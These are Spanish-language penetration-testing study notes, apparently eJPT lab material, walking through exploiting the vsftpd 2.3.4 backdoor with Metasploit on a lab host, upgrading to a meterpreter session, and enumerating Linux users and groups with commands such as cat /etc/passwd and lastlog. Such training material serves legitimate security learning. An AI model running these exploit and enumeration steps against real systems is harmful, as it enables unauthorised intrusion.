> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/ejpt-notes/pruebas-de-penetracion-de-host-y-red/post-explotacion/enumeracion-de-linux/enumeracion-de-usuarios-y-grupos-linux.md).

# Enumeración de usuarios y grupos - Linux

## **🧪 Laboratorio Práctico**

**Paso 1:** Abra el enlace del laboratorio para acceder a la máquina Kali.

<figure><img src="/files/oXsbIC7yOGrOILMf2hJW" alt=""><figcaption></figcaption></figure>

**Paso 2:** Escaneo de puertos con Nmap

Realice un escaneo de puertos para identificar los servicios vulnerables que se ejecutan en el sistema objetivo. Esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
nmap -sV demo.ine.local
```

Como se muestra en la siguiente captura de pantalla, el análisis de Nmap revela que el objetivo tiene un servidor FTP ejecutándose en el puerto 21. La columna de versión del análisis de Nmap revela que el servidor FTP es vsftpd 2.3.4. Esta versión de vsftpd es vulnerable a una vulnerabilidad de ejecución de comandos de puerta trasera y puede explotarse con un módulo de Metasploit.

<figure><img src="/files/G81FkXA8J9HhqGxwfPOa" alt=""><figcaption></figcaption></figure>

**Paso 3:** Obtener acceso.

Ahora que hemos identificado el servicio vulnerable que se ejecuta en el objetivo, podemos iniciar la consola de Metasploit Framework (msfconsole) y ejecutar el módulo de explotación ejecutando el siguiente comando:

**Dominio:**

```
msfconsole -q
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS demo.ine.local
exploit
id
```

**Nota:** Si el exploit no funcionó en el primer intento, ejecútelo nuevamente.

<figure><img src="/files/UFjxzWOa8VcNXNlg0U2R" alt=""><figcaption></figcaption></figure>

También puede obtener una sesión de meterpreter en el sistema de destino actualizando la sesión del shell de comandos. Para ello, ejecute los siguientes comandos:

(Poner la sesión actual en segundo plano.)

**Comandos:**

```
CTRL + Z
sessions -u 1
sessions
sessions -i 2
```

<figure><img src="/files/h5nNBkaYlV81kl1XFsEL" alt=""><figcaption></figcaption></figure>

**Paso 4:** Enumerar usuarios y grupos.

Ahora que hemos obtenido acceso al sistema de destino y hemos obtenido una sesión de meterpreter, podemos comenzar a enumerar los usuarios y grupos en el sistema de destino.

El primer dato que podemos enumerar es el usuario actual al que tenemos acceso, esto se puede hacer ejecutando el siguiente comando meterpreter:

**Dominio:**

```
getuid
```

Como se muestra en la siguiente captura de pantalla, actualmente tenemos acceso al sistema de destino como usuario root.

<figure><img src="/files/v7sJf4SUlFcL1RqEyD7u" alt=""><figcaption></figcaption></figure>

También podemos obtener la misma información manualmente ejecutando el siguiente comando en una sesión de shell de comandos:

**Dominio:**

```
shell
/bin/bash -i
whoami
```

<figure><img src="/files/A83nnOOkaBCFBBEnx1Hv" alt=""><figcaption></figcaption></figure>

Ahora que hemos identificado la cuenta de usuario a la que tenemos acceso, podemos enumerar los grupos de los que el usuario root es parte, esto se puede hacer ejecutando el siguiente comando:

**Dominio:**

```
groups root
```

<figure><img src="/files/K3nUtDjje8Nqwfjsdu1e" alt=""><figcaption></figcaption></figure>

Podemos obtener una lista de otras cuentas de usuario y servicio en el sistema Linux ejecutando el siguiente comando:

**Dominio:**

```
cat /etc/passwd
```

<figure><img src="/files/RWP0MW4SMFjbFZcJQvji" alt=""><figcaption></figcaption></figure>

Podemos enumerar una lista de grupos presentes en el sistema ejecutando el siguiente comando:

**Dominio:**

```
groups
```

<figure><img src="/files/zuvyXn7B60VlpGuDCnLN" alt=""><figcaption></figcaption></figure>

Podemos ver los usuarios que están actualmente conectados ejecutando el siguiente comando:

**Dominio:**

```
who
```

<figure><img src="/files/MQ2VhBSjLdZKbAm680q5" alt=""><figcaption></figcaption></figure>

Como se muestra en la captura de pantalla anterior, actualmente no hay ningún usuario conectado a través de una consola o de forma remota a través de SSH.

También podemos obtener una lista de usuarios que han iniciado sesión recientemente en el sistema ejecutando el siguiente comando:

**Dominio:**

```
lastlog
```

<figure><img src="/files/YgUqCH3FRFCWYOLsTsP5" alt=""><figcaption></figcaption></figure>

#### Conclusión

En este laboratorio, aprendimos sobre el proceso de enumerar información de usuarios y grupos de un sistema de destino que ejecuta Linux.
